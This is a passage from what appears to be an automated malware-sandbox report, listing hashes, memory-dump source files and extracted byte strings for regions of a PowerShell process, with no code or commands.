• Opcode Fuzzy Hash: ad6575ef8b63c0bb9b433dee3c4d1ef9e87c7277ee959e007020d47cd95ce3f6
• Instruction Fuzzy Hash: 0D515C31F043068FDB74E66D9805767BBA6AFC2610F1886FAD486CF251DB31C846C7A1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$tP^q$tP^q
• API String ID: 0-3859475322
• Opcode ID: bc00079a1f9d166f467b6345eebd02119fadbb6b7edadc964228499b771abc7c
• Instruction ID: 69e52b1201e97bd91c67d1f1c4c5c4997adab8f7f894852fec1b73293151e71a
• Opcode Fuzzy Hash: bc00079a1f9d166f467b6345eebd02119fadbb6b7edadc964228499b771abc7c
• Instruction Fuzzy Hash: 16C14831F043469FD770EB6888057ABBBF6AF86310F1485EAD445DB651DA31C886CBA2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$$^q$$^q
• API String ID: 0-2125118731
• Opcode ID: c98888abeabeac73f697f48b1cdafe0814654437740124ef0e4e476d3ed9fa12
• Instruction ID: 9112d6cfd0b1b46e8aecb22fd611c78417060415f128a399593644e4784c1738
• Opcode Fuzzy Hash: c98888abeabeac73f697f48b1cdafe0814654437740124ef0e4e476d3ed9fa12
• Instruction Fuzzy Hash: 06212933B003065FDBB875AD9C05B27AAD65BC0F14F2484BAA405CF3A5DD36D845C361
Strings
Memory Dump Source
• Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q
• API String ID: 0-2049395529
• Opcode ID: 11390109334954997d14260d988e9e65e732b5413e69367f291aeb237d0b923a
• Instruction ID: 81ee0aa54b8fb630e2e2081028dcbcb482fb49dfcb690653b87bb2168bc4a830
• Opcode Fuzzy Hash: 11390109334954997d14260d988e9e65e732b5413e69367f291aeb237d0b923a
• Instruction Fuzzy Hash: 90012B22F493844FC73A267C18285566FB35F9250075A05DBD081DF366CE198D4DC3B2